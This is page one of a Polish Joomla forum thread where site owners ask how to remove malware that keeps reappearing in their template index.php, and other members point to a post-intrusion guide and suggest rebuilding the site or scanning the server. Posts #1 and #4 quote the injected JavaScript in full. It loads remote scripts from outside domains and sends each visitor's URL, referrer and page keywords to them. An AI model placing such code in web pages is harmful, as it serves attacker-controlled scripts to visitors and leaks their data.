Wirus jak się go pozbyć
Strona 1 z 2 12 OstatniOstatni
Wyniki 1 do 10 z 13

Temat: Wirus jak się go pozbyć

  1. #1
    Nowicjusz
    Dołączył
    05-12-2010
    Wpisy
    17
    Punkty
    10

    Domyślny Wirus jak się go pozbyć

    Walczę od jakiegoś czasu... co pewien czasu umieszcza mi w kodzie w index.php w sekcji head takie oto badziestwo : "<script>var a='';setTimeout(10);if(document.referrer.indexOf(l ocation.protocol+"//"+location.host)!==0||document.referrer!==undefine d||document.referrer!==''||document.referrer!==nul l){document.write('<script type="text/javascript" src="http://newsco.fr/js/jquery.min.php?c_utt=SWR2D2&c_utm='+encodeURICompo nent('http://newsco.fr/js/jquery.min.php'+'?'+'default_keyword='+encodeURICo mponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(met as){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window. location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.r eferrer)+'&source='+encodeURIComponent(window.loca tion.host))+'"><'+'/script>');}</script>"

    Zmieniałem hasła administratora, do serwera itd i dalej to samo... nie wiem może gdzieś jeszcze w innych plikach dodaje ... jak to badziewstwo usunąć na dobre ?

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Senior zwiastun awatar
    Dołączył
    20-09-2005
    Wpisy
    27 315
    Punkty
    1142

    Domyślny

    Artykuł Witryna po włamaniu na joomla.pl Kolega czytał? Zastosował się do opisanej tam metodyki postępowania po włamaniu?
    Korzystaj i ciesz się!
    ===============
    Zwiastun
    Biblioteka Elektronicznej Dokumentacji Joomla!

  4. #3
    Nowicjusz
    Dołączył
    05-12-2010
    Wpisy
    17
    Punkty
    10

    Domyślny

    Czytał ... wydaje mi się że nie znalazłem jakiegoś zainfekowanego pliku.... może ktoś miał podobnego wirusa i podpowie gdzie szukać ?

  5. #4
    Przeglądacz
    Dołączył
    28-11-2010
    Wpisy
    83
    Punkty
    11

    Domyślny

    Cześć mam podobny problem... z góry odpowiadam artykuł czytałem już nie raz
    Kod umieszczany w index.php w templates. Na wszystkich moich stronach...

    Kod: script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b ))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://jiva-klatovy.cz/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'K85164' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

    Nie potrafię sobie z tym poradzić, już kilka miesięcy z tym walczę :/

  6. #5
    Wyjadacz komodore awatar
    Dołączył
    02-03-2009
    Skąd
    Poznań
    Wpisy
    822
    Punkty
    109

    Domyślny

    Jeśli nie dajecie rady z opisem, który wskazał zwiastun, to powinniście dać komuś kto się na tym zna, zakładając temat w dziale zleceń. Niestety infekcje choć podobne nie są takie same i nie ma uniwersalnego rozwiązania. Leczenie może być bardzo czasochłonne w zależności od infekcji. Jeśli strona nie ma zbyt wiele treści, to proponuję wykasować wszystko (łącznie z usunięciem starej bazy danych), pozmieniać hasła i postawić ją od nowa.
    Przyłącz się jeśli masz chęć posłuchać lub porozmawiać o Joomla! i niedaleko Ci do Poznania.


    Klikając "Pomógł - daj punkt" poniżej, motywujesz mnie do dalszej pomocy użytkownikom forum.

  7. #6
    Nowicjusz
    Dołączył
    08-06-2006
    Wpisy
    20
    Punkty
    10

    Domyślny

    A prosiliście providera o pomoc w przeskanowaniu witryny? U mnie pomogło (szybko i sprawnie dzięki Linuxpl.com)
    Można też skopiować witrynę do siebie i przeskanować.
    Są też witryny skanujące (nie pytajcie o nazwę bo nie pamiętam).

  8. #7
    Nowicjusz
    Dołączył
    26-11-2014
    Wpisy
    20
    Punkty
    2

    Domyślny

    Cytat Wysłane przez komodore Zobacz wiadomość
    Jeśli nie dajecie rady z opisem, który wskazał zwiastun, to powinniście dać komuś kto się na tym zna
    Nic dodać nic ująć. Szukanie na własną rękę nie mając w tym doświadczenia to jak szukanie igły...

  9. #8
    Debiutant
    Dołączył
    07-11-2016
    Wpisy
    4
    Punkty
    2

    Domyślny

    Sprubujcie przeskanowac serwer tym antiwirusem powinno pomoc (ciach - niedozowolona reklama)

  10. #9
    Bywalec
    Dołączył
    15-02-2008
    Wpisy
    340
    Punkty
    45

    Domyślny

    Cytat Wysłane przez himself007 Zobacz wiadomość
    Sprubujcie
    Co jak co, ale strona internetowa narzędzia z dziedziny bezpieczeństwa powinna budzić zaufanie.
    Wasza nie wzbudza.
    Wręcz przeciwnie.

  11. #10
    Senior Bazyl awatar
    Dołączył
    02-08-2008
    Skąd
    Skierniewice
    Wpisy
    7 693
    Punkty
    574

    Domyślny

    Cytat Wysłane przez pkosela Zobacz wiadomość
    powinna budzić zaufanie
    Nie chodzi o zaufanie, a o wejścia na stronę ;-)
    Ja nie wszedłem...

Strona 1 z 2 12 OstatniOstatni

Podobne tematy

  1. Odpowiedzi: 1
    Ostatni post/autor: 22-09-2012, 01:37
  2. Jak się tego pozbyć?
    przez vitasklep na forum Rozszerzenia - problemy z obsługą, zarządzaniem
    Odpowiedzi: 5
    Ostatni post/autor: 21-10-2009, 19:14
  3. Jak pozbyć się niechcianego ostrzeżenia?
    przez Mr_Crowley na forum Szablony, wygląd, formatowanie
    Odpowiedzi: 1
    Ostatni post/autor: 25-07-2009, 00:21
  4. jak pozbyć się tej liczby?
    przez Dakota na forum Administracja - ogólne
    Odpowiedzi: 5
    Ostatni post/autor: 16-02-2009, 22:10
  5. Jak pozbyć się ramki
    przez Krystek_82 na forum Szablony graficzne
    Odpowiedzi: 1
    Ostatni post/autor: 15-02-2008, 11:31

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •